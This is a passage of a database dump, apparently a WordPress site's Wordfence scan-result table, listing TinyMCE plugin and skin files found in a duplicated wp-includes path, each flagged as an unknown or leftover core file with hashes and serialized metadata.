an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27380,1631424927,1631424927,'new','knownfile',75,'3b255fa6edcdda4b25a07d7cdc869e10','e262b1d3b59ece807c8ad522dbac9e9e','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/paste/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27381,1631424927,1631424927,'new','knownfile',75,'586be478fc1839f7769fd94fc1c3987e','92c0c587f886918f4c1517b025785d0c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27382,1631424927,1631424927,'new','knownfile',75,'9d5f168fd40cc133027c00bce01990e3','0b66f881b02c0d0010ccacb48620270f','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/tabfocus/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27383,1631424927,1631424927,'new','knownfile',75,'33e3a69c557575f610d99187c8342ba3','990df6f55e6bff6687c35f3b8c445044','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27384,1631424927,1631424927,'new','knownfile',75,'bce0ee7b688816ee5fd6bc1f870d1efa','46392b6cde9b8b16993fc0c993101ed1','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/textcolor/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27385,1631424927,1631424927,'new','knownfile',75,'8bbf830db6323fc9e2c1975c5e96b949','fab55ca52212387f473794130449a701','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27386,1631424927,1631424927,'new','knownfile',75,'877aeb8ff407d397358cae64ecb55038','c8b11198956d6d0834358634a2ecf795','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wordpress/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27387,1631424927,1631424927,'new','knownfile',75,'352bdab8bc9789ce8df95915cec6fe55','4987ccf7ac14b98cdd000bb02b60743d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27388,1631424929,1631424929,'new','knownfile',75,'b9eb054205db8c866d245e6460ab7a8b','b5367086ae06fe3370321991624e8579','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27389,1631424929,1631424929,'new','knownfile',75,'e99f7a2cdf1f940e27d8d6ecffbd3dd4','a69bedee5046b7551778b1a4f615db7b','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27390,1631424929,1631424929,'new','knownfile',75,'f7323493d973cb72107929cd421339dc','c1cda47073fd60ba6eb379515c3800a5','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wpdialogs/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27391,1631424929,1631424929,'new','knownfile',75,'54eaef8df1244ac356dab5eafb87ea15','f77d4b4f5551cd17cdc33ee9caee5b29','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27392,1631424929,1631424929,'new','knownfile',75,'184769459501affd88e4c3368b30c80d','771b8184d8f819662bb2ef86a51d2efb','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:68:\"wp-includes/wp-includes/js/tinymce/plugins/wpeditimage/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27393,1631424929,1631424929,'new','knownfile',75,'8780df2e6401acd3f6c34ceb56fb77c3','70b36efdee05e862fd0bda85590bc71a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27394,1631424929,1631424929,'new','knownfile',75,'2353ae9dd05f4a962112c8dfb6cc0e6b','922af3a95fc30dfca77cfb7662e5216d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/plugins/wpemoji/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27395,1631424929,1631424929,'new','knownfile',75,'f1c8f016ca10038b4bed5cdfc26d5d5d','bcc88bfab3cba6ebda8dabb0ee71d809','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27396,1631424929,1631424929,'new','knownfile',75,'5712a53d779d2aa76a885ac9a9e071b9','69c7b851176ffc264dde52f6a0afc2db','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27397,1631424930,1631424930,'new','knownfile',75,'a21b625eb3c6bc6b221eaf678d138d41','291a62c01142e033f913c6b0b57a5551','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27398,1631424930,1631424930,'new','knownfile',75,'2b5ff4b3ff71121095654cdd24475018','74993d3cf6226fa688db17b230c76e0a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/wplink/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27399,1631424930,1631424930,'new','knownfile',75,'1236f02a118f63382c245969b98815d4','cba5760363e5fba47fa14b8551c3515d','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27400,1631424930,1631424930,'new','knownfile',75,'d745e619453228d7682a41d0bbd39e61','bb0fc45c9e03c0fb175c62d352b5a107','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/tinymce/plugins/wptextpattern/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27401,1631424930,1631424930,'new','knownfile',75,'0ce510e6244f7c3b41459f3ea5c085fa','cb4f6665b542571c12b89ea5c072ccf6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27402,1631424930,1631424930,'new','knownfile',75,'78de2a97a8ca774e8b6a56e03bb93fd5','2975a6fbe678a26128d0dab4d1688e41','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/plugins/wpview/plugin.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27403,1631424930,1631424930,'new','knownfile',75,'a09b5a3b5a03c8b821e7712ffd86893a','31625bee1e283167b3f74c2059827b69','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/content.inline.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27404,1631424930,1631424930,'new','knownfile',75,'ecc1927debca31bd81e0917921f64253','52239750a770fb82c5cb00c931066eda','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/content.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27405,1631424930,1631424930,'new','knownfile',75,'658215181b1698eb227d925cf531fa3c','4ab40af5cce893d46629d9314d0db2a6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/anchor.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27406,1631424930,1631424930,'new','knownfile',75,'871f5875b18c2fdd66e893dcd92f732e','f965573b785df25b62697c6a927822bf','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/loader.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27407,1631424931,1631424931,'new','knownfile',75,'56b54d198298a01e62845cd17117c263','554131c712898082dab52d9ab60990a4','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/object.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27408,1631424931,1631424931,'new','knownfile',25,'0789c1a33040d5d68e707b1c93a0c640','40d43bd1c1bb851b29b89efd303e12a6','Old WordPress core file not removed during update: wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/img/trans.gif\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27409,1631424931,1631424931,'new','knownfile',75,'cf5308feae8f679131b0ae1e04176372','f598e42ee17745239bde9817d15b36a2','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/tinymce/skins/lightgray/skin.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27410,1631424931,1631424931,'new','knownfile',75,'129fc9eae1e1dbd54c15ead362ea640e','3d7f63025b9f8f2440b3f74561989f2c','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27411,1631424931,1631424931,'new','knownfile',75,'4281b6a1c14fac05cf7ffd780d4ccd22','9fdf77f05c5a4e319607225f474c7a5a','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:75:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27412,1631424931,1631424931,'new','knownfile',75,'a09d92dfd9ce1b26b427a82127b85229','ab551f21ba130c3df9a4429069777a77','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27413,1631424931,1631424931,'new','knownfile',75,'86ece52012af20c180c96cb5dba800b3','a99701ff751bfd9255aa6d71ec92a5d6','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/embedded.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27414,1631424931,1631424931,'new','knownfile',75,'2bd3c4730202336a92de1a48d9963119','100b9afb885110165939cfcbe4a9939b','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27415,1631424931,1631424931,'new','knownfile',75,'e5d3b702214be9e437b0af2dffe859a4','f145a05834779ba825b5a191bc1140e8','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/gallery.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27416,1631424931,1631424931,'new','knownfile',75,'19a1a612c34254dab3459aca6a69335b','ca7408fb0737a86533cf1b5c9978af74','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more-2x.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27417,1631424931,1631424931,'new','knownfile',75,'5aa36a57708fe60b29042a9b0e1e6077','b4a9cd6e7a31f3b959a89c7be230d0b7','Unknown file in WordPress core: wp-includes/wp-includes/js/tinymce/skins/wordpress/images/more.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 